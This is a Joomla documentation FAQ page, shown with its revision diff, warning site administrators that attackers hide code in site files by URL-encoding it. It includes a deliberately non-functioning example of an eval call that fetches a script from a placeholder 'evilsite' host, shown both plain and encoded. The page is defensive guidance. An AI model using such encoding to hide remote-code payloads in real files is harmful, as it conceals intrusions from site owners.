What are these strange (URL-Encoded) characters doing in your code?
From Joomla! Documentation
(Difference between revisions)
(New page: == What are these strange (URL-Encoded) characters doing in my code? == Overview Attackers sometimes hide code away from prying eyes by URL Encoding it. The purpose of URL Encoding is t...) |
m (eliminate repeating the title and table markup into wikitable markup) |
||
| (One intermediate revision by one user not shown) | |||
| Line 1: | Line 1: | ||
| − | == | + | == Overview == |
| − | + | ||
| − | + | ||
Attackers sometimes hide code away from prying eyes by URL Encoding it. | Attackers sometimes hide code away from prying eyes by URL Encoding it. | ||
| Line 11: | Line 9: | ||
Here are some trivial, non-functioning examples of URL Encoded text: | Here are some trivial, non-functioning examples of URL Encoded text: | ||
| − | + | {| class="wikitable" | |
| − | + | !Original | |
| − | + | !URL Encoded | |
| − | + | |- | |
| − | + | |this line has spaces | |
| − | + | |this%20line%20has%20spaces | |
| − | + | |- | |
| − | + | |eval(evil_script(http://www.evilsite/?evilscript.pl")); | |
| − | + | |%65val%28%65%76il_%73cri%70t<br/> | |
| − | + | %28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73<br/> | |
| − | + | cript.%70l%22%29%29%3B | |
| − | + | |} | |
| − | %28%68tt%70%3A//%77%77%77. | + | |
| − | %65%76il%73ite/%3F%65%76il%73 | + | |
| − | cript.%70l%22%29%29%3B | + | |
| − | + | ||
| − | + | ||
'''Resources''' | '''Resources''' | ||
| Line 37: | Line 30: | ||
<!-- KEEP THIS AT THE END OF THE PAGE --> | <!-- KEEP THIS AT THE END OF THE PAGE --> | ||
| + | <noinclude> | ||
[[Category:Security]] | [[Category:Security]] | ||
| − | + | [[Category:FAQ]] | |
| − | + | ||
[[Category:FAQ]] | [[Category:FAQ]] | ||
[[Category:Administration FAQ]] | [[Category:Administration FAQ]] | ||
| − | [[Category:Version 1.5 FAQ]] | + | [[Category:Version 1.5 FAQ]]</noinclude> |
Latest revision as of 16:06, 17 October 2012
[edit] Overview
Attackers sometimes hide code away from prying eyes by URL Encoding it.
The purpose of URL Encoding is to allow non-URL compatible characters to be passed via the URL. There are many legitimate reasons for doing this, such as hiding email from spammers, dealing with spaces in file names. etc.
However, if you find odd, URL-encoded text in your site's files, you should investigate immediately. URL encoded text is very easy to translate using PHP, javascript, or one of the many free, online translators.
Here are some trivial, non-functioning examples of URL Encoded text:
| Original | URL Encoded |
|---|---|
| this line has spaces | this%20line%20has%20spaces |
| eval(evil_script(http://www.evilsite/?evilscript.pl")); | %65val%28%65%76il_%73cri%70t %28%68tt%70%3A//%77%77%77.%65%76il%73ite/%3F%65%76il%73 |
Resources
